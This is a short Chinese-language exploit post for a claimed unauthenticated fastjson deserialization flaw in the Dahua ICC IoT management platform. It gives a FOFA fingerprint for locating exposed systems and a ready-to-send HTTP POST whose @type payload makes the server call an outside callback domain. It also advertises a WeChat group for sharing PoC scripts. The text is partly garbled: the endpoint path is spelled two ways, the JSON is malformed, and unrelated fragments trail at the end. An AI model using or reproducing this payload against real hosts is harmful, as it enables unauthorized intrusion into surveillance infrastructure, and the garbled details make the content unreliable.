0x01 產品簡介
大華ICC智能物聯綜合管理平臺對技術組件進行模塊化和松耦合,將解決方案分層分級,提高面向智慧物聯的數據接入與生態合作能力。
0x02 漏洞概述
由于大華智能物聯綜合管理平臺使用了存在漏洞的Fastson組件,未經身份驗讓的攻擊者可利用 /ev0-uns/v1.0/auths/sysusers/random接口發送惡意的序列化數據執行任意指令,造成代碼執行。
0x03 搜索語法
FOFA:icon_hash="-1935899595"
0x04 漏洞復現
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://asvjwdpldi.dgrh3.cn"}}""
}
0x05 工具批量
nuclei
afrog
xray
POC腳本獲取
請使用VX掃一掃加入內部POC腳本分享圈子
)
系統架構之系統能力的內存隔離和保護)
詢問)
